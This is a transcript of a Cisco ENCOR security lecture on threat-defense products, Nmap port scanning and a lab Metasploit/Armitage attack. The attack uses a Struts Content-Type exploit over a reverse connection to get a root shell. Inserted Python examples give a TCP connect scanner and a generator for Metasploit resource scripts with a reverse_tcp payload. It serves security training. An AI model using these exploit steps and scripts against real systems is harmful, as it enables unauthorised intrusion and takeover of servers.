350-401 ENCOR – Cisco CCIE Enterprise – Security part 7
January 27, 2023

24. Threat Defense & Endpoint Security

In 5.5.a we have threat defense and in 5.5.b we have endpoint security. So what I'm going to do in the upcoming four sessions is show you how the hacking is done, meaning how we can gain more privilege and then attack certain endpoints with the help of Metasploit, which is again a hacking tool. With that you can gain access, so you will see the attack side, and then you will see the defense side as well: with the help of, for example, Firepower, how you can protect. So we have two examples related to attack and defense, and one session related to port scanning.

Because nowadays there are so many tools you can use even if you don't know much about hacking or security breaches; somehow you can download them from somewhere. And if you are not using a corporate laptop, and you connect your non-corporate laptop to the corporate network while working from home or from a remote location, there may be security breaches that we cause unwantedly, unknowingly. So before doing the lab, let's quickly go through the lab setup and check what type of defense mechanisms we have. With respect to FTD, this is again a topic that will come under 5.5.c.

You can see here that we can analyze signatures. With respect to next-generation IPS, we have full visibility of the flow of traffic. Now the question is, why do we have full visibility? We have full visibility because my firewall and my devices can recognize the application. So one popular term is AVC, application visibility and control. Whenever a packet goes via the firewall or the perimeter firewall, these devices are intelligent enough to learn the metadata of that application, and according to that we can put a rule in place. Not only that: for next-generation firewalls, the latest firewalls, nowadays we are not calling them firewalls but security appliances.

So these security appliances can not only do the firewalling stuff, like blocking and allowing ports and certain applications, but they also combine with IPS functionality. We don't need to insert a separate IPS/IDS module; it is built in. They have full application visibility and control. For high availability, say for example we put two devices in active/passive, so if one crashes the other becomes active; that is for redundancy and high availability. But now all these modern security appliances also have the capability to do analytics and automation. They can be integrated with Threat Grid, and they can be integrated with the AMP cloud as well.

So those integrations are there; we can go there and do URL filtering or web filtering. This can be integrated with ISE, and we have integration via pxGrid. So you can integrate your security devices, or other devices, with ISE, which will provide you contextual information, and according to that you can take a decision. Again, one term related to ISE is profiling, so we have profiling options as well. Now, as I told you, in the next four sections we are going to attack a network, gain access, and then see how the defense mechanisms, in the form of AMP, Firepower, ISE, email security, web security, etc., whatever layer of security we have, will protect. In the upcoming example, when we do the attack, we will mitigate via the next-generation firewall; obviously in a next-generation firewall we have not only the firewalling capability but IPS/IDS and URL filtering as well.

Now, when we are talking about endpoints, here you can see that we have AMP for Endpoints, and that is actually very powerful. So we have advanced malware protection at the endpoint. At the moment the malware comes and hits the endpoint, that is the last line of defense, correct? Someone has breached all the security layers and reached the last mile, the last line, but still at that last mile we have AMP, advanced malware protection. It is connected to the AMP cloud and from there it gets all the updates, so it will provide security. Cisco AnyConnect VPN is also a powerful full client agent that is installed on the laptop to make the actual remote-access VPN connection to the firewall or any type of server.

Correct? So these are the endpoint-related terms. We have seen Cisco Umbrella as well, and how it provides the first layer or first line of defense. Whenever any traffic is coming from outside, I have this Cisco Umbrella layer, and it has so many capabilities: it can act as a cloud-based firewall, it can do some URL filtering, it can act as a proxy. There are so many features built into Cisco Umbrella that will provide your first line of defense. Again, Cisco supports some third-party vendors as well for application visibility and analytics, so those options are also there in terms of security. So let's stop here, and you can refer to this topology for the upcoming sessions. Let's stop and check the upcoming four lab-related videos.

25. Reconnaissance using NMAP

Let us do reconnaissance using Nmap, the network mapper. This is one of the most popular tools among all network professionals, not only for hacking or ethical hacking but for auditing and penetration testing. Nmap is very easy to use. There are various scans we can perform: host discovery, port scanning, version detection, OS detection, and scriptable interaction with the target. We have these options, but the overall CLI commands to achieve these targets are actually very straightforward. You can go and visit these sites: one is the port scanning techniques page of the nmap.org reference guide, the other is the cheat sheet.

You can also refer to the two-page cheat sheet for reference. Let me show you the website. If you go there, you will get a very nice description of Nmap's capabilities. Then we have small strings, say nmap and then -sS: this is for the TCP SYN scan; then the TCP connect scan (-sT), UDP scans (-sU), and other scan types as well. So have a look at this particular site. Today we have to do some scanning, so I will show you a few of the scans, but it's open; you can go and take the reference as well. Coming back to our slide: once we do the scan, then in the next section, in the next recording, I'm going to introduce the Rapid7 Nexpose vulnerability tool. From there we'll get a list of vulnerabilities for that specific server or target. So before doing that, let us do this Nmap scan.

At the moment we know what my target is. So here you can see that with respect to the target, I can do a TCP scan, I can do UDP scans, I can do some selective port scans, and I can check which hosts are live. So all these things we have. Let me log in to my Kali Linux server; from there I can use Nmap. Okay, so let's do it. First of all you have to type the keyword nmap, and then what you want to scan. I want to do a TCP scan, so I can give -sT as the string and then the target. I know this is my target, and you see that it's very fast, so I come to know that, okay, these ports are open (22 and a few others) on this particular target. Suppose I want to see the overall subnet I have, or the overall IPs in a particular subnet: I can give that subnet, say /24, as the target. Now it has started scanning; we'll wait for the result. And here we have the summary: it has scanned a total of 256 addresses. Now suppose I don't want to scan all 256, I want to scan a few of them, for example a /28. So here you can see it has scanned a few of them as well, 16 hosts, and if it gets any response it will tell you: okay, .25 is up, then .28.

So here you can see that initially we also figured out .25 and .28. Let us do a UDP scan. How do we do it? You have to give nmap and then -sU. If you want to select some ports, you can give the port numbers: say 123 is for NTP, then 161 and 162 are for SNMP. Then you give the IP as well, for example .25. Let's see: all these ports are closed on .25. Okay. So these are the scans we can go and do. Let me show you how you can give a specific port, say 22 (SSH), against the same target: on .25 it is open, and if I check the other target, .28, it is also open.

Let me show you how you can give a range of ports. I can give -p with UDP ports, say U:53 for DNS and 137, and then I want to give some TCP ports, say T:21-25, then 80 and 443, and then the target IP, .25. Now you can see I am being selective with the ports and I am getting the result in this format: some ports are open, some ports are closed. And if I simply want to check my UDP ports only, I can run the UDP scan alone. Let's see; okay, Nmap is done with the scan. So this is the way you can do the manipulation while you are scanning the target, whether you are interested in scanning UDP ports or TCP ports.
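As an added example, not part of the lecture: the -sT scan used above completes a full TCP three-way handshake against every port, which is why it needs no raw-socket privilege and why the target service logs the connection. The block below parses an nmap-style -p port spec such as U:53,137,T:21-25,80,443 (a T: or U: prefix applies to every following item until the next prefix, as with nmap) and runs a connect scan against a listener it starts on 127.0.0.1, so it runs offline. The function names and the loopback listener are mine; UDP ports are parsed but not probed, because without an ICMP port-unreachable reply a UDP probe cannot tell open from filtered.

```python
"""Added example: nmap-style port spec parsing and a TCP connect scan."""
import socket
import threading


def parse_port_spec(spec):
    """Parse an nmap-style -p spec into a sorted list of (proto, port).

    A 'T:' or 'U:' prefix applies to every following item until the next
    prefix; items are single ports or 'lo-hi' ranges.  Assumption: TCP is
    the default protocol when no prefix has been seen, as with nmap.
    """
    ports = set()
    proto = "tcp"
    for item in spec.split(","):
        item = item.strip()
        if ":" in item:
            prefix, item = item.split(":", 1)
            proto = {"T": "tcp", "U": "udp"}[prefix.upper()]
        if "-" in item:
            lo, hi = (int(x) for x in item.split("-", 1))
        else:
            lo = hi = int(item)
        if not 1 <= lo <= hi <= 65535:
            raise ValueError(f"bad port item: {item!r}")
        ports.update((proto, p) for p in range(lo, hi + 1))
    return sorted(ports)


def tcp_connect_scan(host, ports, timeout=0.5):
    """Return {port: 'open'|'closed'|'filtered'} using full connect() calls."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))          # handshake completed -> open
            results[port] = "open"
        except ConnectionRefusedError:       # RST came back -> closed
            results[port] = "closed"
        except OSError:                      # timeout / no reply -> filtered
            results[port] = "filtered"
        finally:
            s.close()
    return results


def start_local_listener():
    """Bind a TCP listener on an ephemeral loopback port (demo target)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:      # listener closed -> stop serving
                return

    threading.Thread(target=serve, daemon=True).start()
    return srv


def demo():
    """Scan one listening and one unbound loopback port; return verdicts."""
    srv = start_local_listener()
    open_port = srv.getsockname()[1]
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                # released, nobody listening -> 'closed'
    verdicts = tcp_connect_scan("127.0.0.1", [open_port, closed_port])
    srv.close()
    return verdicts[open_port], verdicts[closed_port]


if __name__ == "__main__":
    print(parse_port_spec("U:53,137,T:21-25,80,443"))
    print(demo())
```

A 'closed' verdict here depends on the kernel answering with an RST; a host firewall that silently drops the SYN turns the same port into 'filtered', which is exactly the distinction Nmap reports.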

26. Attack Public Network via Front Door

Now we are all set to attack the target. What have we done so far? We have done port scanning, and we know the open ports. Then with the help of Metasploit we come to know the vulnerability. Now we are going to exploit that and get root access with the help of that exploit. That is the overall goal of this particular section. So what do we have in our lab? First of all we'll try to attack, and once we have successfully attacked that particular server, in the next section, with the help of Cisco Firepower and IPS rules, we'll try to mitigate. Okay, so let us attack. You can see here our resources: we have Kali Linux, which includes Metasploit by default; we have the attacker resource; we have done the vulnerability assessment with the help of Nexpose; and we have an attack target as well.

Then from the defense side we have FMC as the centralized management console, and we have sensors, the FTDs. Okay, so we are going to use all these attack and defense tools one by one. First of all, let us attack. For this I'm going to use Armitage as the attacker. With the help of this particular application on top of Metasploit I'm going to do the attack, and I will show you all the steps: how you launch Armitage and then do the attack. If you want all the step-by-step configuration and options, you can see here the same thing I'm going to show you with the help of our Kali Linux Metasploit. So let us log in; I am inside my Kali Linux. The first thing we should do inside Linux is check whether Metasploit is running or not. We can check the initialization of its database with msfdb. So let me run that quickly and we'll wait.

Once I get the confirmation that it is started and already configured, I'll go and start Armitage. Let's start it. Simply type the keyword armitage and it will pop up. Let's see. Here you can see: yes, I want to connect, the user is msf, and let's connect. Yes. You need to read all these prompts and choose yes or no. So yes, I want the Metasploit RPC server to be connected; let's connect that. We have some legal warnings, the warnings about illegal access; enable warnings, all these things. Now we have a new window, and here at the bottom you can see that we have the CLI as well. Now we want to exploit, obviously. So what I'll do is go here and look inside the exploits, because I'm very much looking for Struts.

What Struts exploits do we have? Here you can see that I have so many, but I'm looking for the Struts Content-Type one. If I double-click it, you can see the detailed description of this Struts exploit, plus what the source and destination are. If you click the plus sign here, it will tell you the remote port, the target URI, the local host, all this information. Okay. Yes, I want to use a reverse connection; that's important. Before launching this, let me close here and go back to the CLI, because I wanted to show you some other aspects as well. Here we can see which source script you are running. So let me show you that. Let me open it; if I go to my root folder, inside the root folder let me show you the program we are running.

So here you can see that I have a program, and what is the program I want to show you? Let me open it. If I cat module4.rc, here it is. Here they use the exploit we are going to run: the exploit, the payload, the remote host that we know,

what the target is, the remote port, the target URI I'm going to use, and then the local host as the source of the attack, and the local port. So this is set: this is where I'm going to attack. Let me go back one more time; let me start Armitage one more time and then we will do the attack. You can see that the steps we are using here in our lab are similar to the steps, the pattern, a hacker would also follow. First of all, do the reconnaissance, where you find the target server and target ports. Once you know the open ports, you check for the running applications.

Once you know those applications, you go and check what the vulnerabilities inside those applications are. Once you know the vulnerabilities, then you need code. If the code is available, good; otherwise you have to write it. Once you have the code, the next step is to create a connection from your source to the destination, because at the end of the day you want access to those servers. So I'm going to use the reverse connection and launch. Once we do that, we'll see how it works. Here you can see the console is there and the exploit is there: payload set, remote port set, SSL false, unknown variable. It tried to do everything to run that exploit.

Failed: the following options failed to validate: RHOST. Exploit completed, but no session was created. So here we see that, okay, our attack has failed and we need to set the correct variable. Why did the options fail to validate? It is failing to validate the remote host. As we see, our first attempt has failed. And if I go and check the module, here you can see that for the remote host, instead of the DNS name, I have given the IP address, and for the remote port I have given 80. Although we know which ports are open, what the target URI is, that's very important: see, client portal, file upload, upload action. So I need to check this as well; I need to check where I am going to do this attack. All these parameters should match inside Armitage. So let me open it one more time and let's do it. Now it is opening; let's wait till it opens. Yes, it opens. Inside exploits, what I will do is go and search the vulnerability, and double-click it. Now here you can see that in the remote host there is nothing.

So what I'll do: I will put the correct destination, that is .25. Then here I will give the port number as 80. And what is the target URI? Let me correct that as well: the URI is the client-portal file-upload upload action. Okay. All right, so we are good up to this point. I will use the reverse connection and launch. Let's see whether this time we get success or not. If the attack is successful, you will find that this will change color and show you that it has been compromised. Here you can see that I can right-click, Shell, Interact, and then Shell 1 opens. If I type whoami, ls -la, pwd (a little bit of Linux will help here), you can see that now I am root, and now I can do anything. So part by part you have seen how we exploited: how we checked the vulnerability, how I did the port scan, and now I am inside the server.
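As an added example, not part of the lecture: the module .rc file shown above is a Metasploit resource script, a list of msfconsole commands (use, set, exploit) that msfconsole -r replays, and the first launch failed only at run time with "options failed to validate" because the remote host was wrong. The block below renders such a script and checks the options first, so an empty or non-IP RHOSTS is caught before the exploit fires. The helper names, the module and payload strings, the placeholder /upload.action URI and the 10.0.0.x addresses are mine, not values from the lab.

```python
"""Added example: render and pre-validate a Metasploit resource script."""
import ipaddress

# Options the lecture's module .rc sets for the remote exploit (assumed names).
REQUIRED = ("RHOSTS", "RPORT", "TARGETURI", "LHOST", "LPORT")


def validate_options(opts):
    """Return a list of validation errors; an empty list means usable."""
    errors = []
    for name in REQUIRED:
        if not str(opts.get(name, "")).strip():
            errors.append(f"{name}: missing or empty")
    for name in ("RHOSTS", "LHOST"):
        value = opts.get(name)
        if value:
            try:
                ipaddress.ip_address(value)
            except ValueError:
                # The lecture's first attempt failed on the remote host;
                # requiring an IP literal here mirrors the fix it applied.
                errors.append(f"{name}: {value!r} is not an IP address")
    for name in ("RPORT", "LPORT"):
        value = opts.get(name)
        if value and not (str(value).isdigit() and 1 <= int(value) <= 65535):
            errors.append(f"{name}: {value!r} is not a valid port")
    uri = str(opts.get("TARGETURI", ""))
    if uri and not uri.startswith("/"):
        errors.append("TARGETURI: must start with '/'")
    return errors


def build_resource_script(module, payload, opts):
    """Render msfconsole commands; raise ValueError if options fail."""
    errors = validate_options(opts)
    if errors:
        raise ValueError("options failed to validate: " + "; ".join(errors))
    lines = [f"use {module}", f"set PAYLOAD {payload}"]
    lines += [f"set {name} {opts[name]}" for name in REQUIRED]
    lines.append("exploit -j")  # run as a background job, as Armitage does
    return "\n".join(lines) + "\n"


def demo():
    """Reproduce the failing first run and the corrected second run."""
    module = "exploit/multi/http/struts2_content_type_ognl"   # assumed name
    payload = "linux/x64/meterpreter/reverse_tcp"              # connect-back
    first_try = {"RHOSTS": "target.example", "RPORT": 8080, "TARGETURI": "/",
                 "LHOST": "10.0.0.5", "LPORT": 4444}           # constructed
    corrected = dict(first_try, RHOSTS="10.0.0.25", RPORT=80,
                     TARGETURI="/upload.action")
    return validate_options(first_try), build_resource_script(module, payload, corrected)


if __name__ == "__main__":
    errors, script = demo()
    print("first try:", errors)
    print(script)
```

Running the rendered text through msfconsole -r is equivalent to typing the commands at the msf prompt; the pre-check only removes the guesswork the lecture went through when the console reported the validation failure after launch.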
